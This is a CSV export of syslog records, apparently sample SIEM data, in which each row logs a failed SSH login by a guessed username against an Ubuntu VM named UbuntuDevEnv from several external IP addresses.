+17086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:15,UbuntuDevEnv,2019-06-26 08:33:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:17,UbuntuDevEnv,2019-06-26 08:33:17,auth,UbuntuDevEnv,info,Failed password for invalid user mirror03 from 143.0.52.117 port 35243 ssh2,58322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mirror03,143.0.52.1,35243,,
+17088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:18,UbuntuDevEnv,2019-06-26 08:33:17,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 35243:11: Bye Bye [preauth],58322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,35243,,
+17089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:18,UbuntuDevEnv,2019-06-26 08:33:17,auth,UbuntuDevEnv,info,Disconnected from invalid user mirror03 143.0.52.117 port 35243 [preauth],58322,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mirror03,143.0.52.1,35243,,
+17090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:23,UbuntuDevEnv,2019-06-26 08:33:22,auth,UbuntuDevEnv,info,Invalid user dao from 183.47.14.74 port 59605,58335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dao,183.47.14.7,59605,,
+17091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:23,UbuntuDevEnv,2019-06-26 08:33:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,58335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:23,UbuntuDevEnv,2019-06-26 08:33:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:24,UbuntuDevEnv,2019-06-26 08:33:24,auth,UbuntuDevEnv,info,Failed password for invalid user dao from 183.47.14.74 port 59605 ssh2,58335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dao,183.47.14.7,59605,,
+17094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:25,UbuntuDevEnv,2019-06-26 08:33:24,auth,UbuntuDevEnv,info,Disconnected from invalid user dao 183.47.14.74 port 59605 [preauth],58335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dao,183.47.14.7,59605,,
+17095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:25,UbuntuDevEnv,2019-06-26 08:33:24,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 59605:11: Bye Bye [preauth],58335,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,59605,,
+17096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:58,UbuntuDevEnv,2019-06-26 08:33:58,auth,UbuntuDevEnv,info,Invalid user wifi from 185.103.243.78 port 35200,58465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wifi,185.103.243.7,35200,,
+17097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:58,UbuntuDevEnv,2019-06-26 08:33:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,58465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:33:58,UbuntuDevEnv,2019-06-26 08:33:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:34:00,UbuntuDevEnv,2019-06-26 08:34:00,auth,UbuntuDevEnv,info,Failed password for invalid user wifi from 185.103.243.78 port 35200 ssh2,58465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wifi,185.103.243.7,35200,,
+17100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:34:00,UbuntuDevEnv,2019-06-26 08:34:00,auth,UbuntuDevEnv,info,Disconnected from invalid user wifi 185.103.243.78 port 35200 [preauth],58465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wifi,185.103.243.7,35200,,
+17101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:34:00,UbuntuDevEnv,2019-06-26 08:34:00,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 35200:11: Bye Bye [preauth],58465,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,35200,,
+17102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:00,UbuntuDevEnv,2019-06-26 08:34:59,auth,UbuntuDevEnv,info,Invalid user deploy from 143.0.52.117 port 43785,58682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,143.0.52.1,43785,,
+17103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:00,UbuntuDevEnv,2019-06-26 08:34:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:00,UbuntuDevEnv,2019-06-26 08:34:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,58682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:02,UbuntuDevEnv,2019-06-26 08:35:01,auth,UbuntuDevEnv,info,Failed password for invalid user deploy from 143.0.52.117 port 43785 ssh2,58682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,143.0.52.1,43785,,
+17106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:03,UbuntuDevEnv,2019-06-26 08:35:02,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 143.0.52.117 port 43785 [preauth],58682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,143.0.52.1,43785,,
+17107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:03,UbuntuDevEnv,2019-06-26 08:35:02,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 43785:11: Bye Bye [preauth],58682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,43785,,
+17108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:12,UbuntuDevEnv,2019-06-26 08:35:11,auth,UbuntuDevEnv,info,Invalid user li from 183.47.14.74 port 39320,58723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,li,183.47.14.7,39320,,
+17109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:12,UbuntuDevEnv,2019-06-26 08:35:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:12,UbuntuDevEnv,2019-06-26 08:35:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,58723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:14,UbuntuDevEnv,2019-06-26 08:35:13,auth,UbuntuDevEnv,info,Failed password for invalid user li from 183.47.14.74 port 39320 ssh2,58723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,li,183.47.14.7,39320,,
+17112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:14,UbuntuDevEnv,2019-06-26 08:35:14,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 39320:11: Bye Bye [preauth],58723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,39320,,
+17113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:14,UbuntuDevEnv,2019-06-26 08:35:14,auth,UbuntuDevEnv,info,Disconnected from invalid user li 183.47.14.74 port 39320 [preauth],58723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,li,183.47.14.7,39320,,
+17114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:34,UbuntuDevEnv,2019-06-26 08:35:34,auth,UbuntuDevEnv,info,Invalid user minecraft from 185.103.243.78 port 50792,58813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,185.103.243.7,50792,,
+17115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:34,UbuntuDevEnv,2019-06-26 08:35:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,58813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:34,UbuntuDevEnv,2019-06-26 08:35:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,58813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:36,UbuntuDevEnv,2019-06-26 08:35:36,auth,UbuntuDevEnv,info,Failed password for invalid user minecraft from 185.103.243.78 port 50792 ssh2,58813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,185.103.243.7,50792,,
+17118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:36,UbuntuDevEnv,2019-06-26 08:35:36,auth,UbuntuDevEnv,info,Disconnected from invalid user minecraft 185.103.243.78 port 50792 [preauth],58813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraft,185.103.243.7,50792,,
+17119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:35:36,UbuntuDevEnv,2019-06-26 08:35:36,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 50792:11: Bye Bye [preauth],58813,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,50792,,
+17120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:36:46,UbuntuDevEnv,2019-06-26 08:36:45,auth,UbuntuDevEnv,info,Invalid user teacher1 from 143.0.52.117 port 52328,59071,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teacher1,143.0.52.1,52328,,
+17121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:36:46,UbuntuDevEnv,2019-06-26 08:36:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,59071,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+17122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:36:46,UbuntuDevEnv,2019-06-26 08:36:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59071,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:36:48,UbuntuDevEnv,2019-06-26 08:36:47,auth,UbuntuDevEnv,info,Failed password for invalid user teacher1 from 143.0.52.117 port 52328 ssh2,59071,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teacher1,143.0.52.1,52328,,
+17124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:36:48,UbuntuDevEnv,2019-06-26 08:36:47,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 52328:11: Bye Bye [preauth],59071,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,52328,,
+17125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:36:48,UbuntuDevEnv,2019-06-26 08:36:47,auth,UbuntuDevEnv,info,Disconnected from invalid user teacher1 143.0.52.117 port 52328 [preauth],59071,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teacher1,143.0.52.1,52328,,
+17126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:37:00,UbuntuDevEnv,2019-06-26 08:36:59,auth,UbuntuDevEnv,info,Invalid user stagiaire from 183.47.14.74 port 47266,59113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stagiaire,183.47.14.7,47266,,
+17127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:37:00,UbuntuDevEnv,2019-06-26 08:36:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:37:00,UbuntuDevEnv,2019-06-26 08:36:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,59113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+17129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:37:02,UbuntuDevEnv,2019-06-26 08:37:02,auth,UbuntuDevEnv,info,Failed password for invalid user stagiaire from 183.47.14.74 port 47266 ssh2,59113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stagiaire,183.47.14.7,47266,,
+17130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:37:02,UbuntuDevEnv,2019-06-26 08:37:02,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 47266:11: Bye Bye [preauth],59113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,47266,,
+17131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:37:02,UbuntuDevEnv,2019-06-26 08:37:02,auth,UbuntuDevEnv,info,Disconnected from invalid user stagiaire 183.47.14.74 port 47266 [preauth],59113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,stagiaire,183.47.14.7,47266,,
+17132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:37:09,UbuntuDevEnv,2019-06-26 08:37:08,auth,UbuntuDevEnv,info,Invalid user luis from 185.103.243.78 port 38158,59153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,luis,185.103.243.7,38158,,
+17133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:37:09,UbuntuDevEnv,2019-06-26 08:37:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:37:09,UbuntuDevEnv,2019-06-26 08:37:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,59153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+17135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:37:11,UbuntuDevEnv,2019-06-26 08:37:10,auth,UbuntuDevEnv,info,Failed password for invalid user luis from 185.103.243.78 port 38158 ssh2,59153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,luis,185.103.243.7,38158,,
+17136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:37:11,UbuntuDevEnv,2019-06-26 08:37:10,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 38158:11: Bye Bye [preauth],59153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,38158,,
+17137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:37:11,UbuntuDevEnv,2019-06-26 08:37:10,auth,UbuntuDevEnv,info,Disconnected from invalid user luis 185.103.243.78 port 38158 [preauth],59153,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,luis,185.103.243.7,38158,,
+17138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:25,UbuntuDevEnv,2019-06-26 08:38:24,auth,UbuntuDevEnv,info,Invalid user wrapper from 45.55.190.46 port 53556,59369,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wrapper,45.55.190.4,53556,,
+17139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:25,UbuntuDevEnv,2019-06-26 08:38:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,59369,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+17140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:25,UbuntuDevEnv,2019-06-26 08:38:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59369,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:27,UbuntuDevEnv,2019-06-26 08:38:26,auth,UbuntuDevEnv,info,Failed password for invalid user wrapper from 45.55.190.46 port 53556 ssh2,59369,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wrapper,45.55.190.4,53556,,
+17142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:27,UbuntuDevEnv,2019-06-26 08:38:26,auth,UbuntuDevEnv,info,Disconnected from invalid user wrapper 45.55.190.46 port 53556 [preauth],59369,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wrapper,45.55.190.4,53556,,
+17143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:27,UbuntuDevEnv,2019-06-26 08:38:26,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 53556:11: Bye Bye [preauth],59369,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,53556,,
+17144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:31,UbuntuDevEnv,2019-06-26 08:38:30,auth,UbuntuDevEnv,info,Invalid user svt from 143.0.52.117 port 60870,59446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svt,143.0.52.1,60870,,
+17145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:38:31,UbuntuDevEnv,2019-06-26 08:38:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,59446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
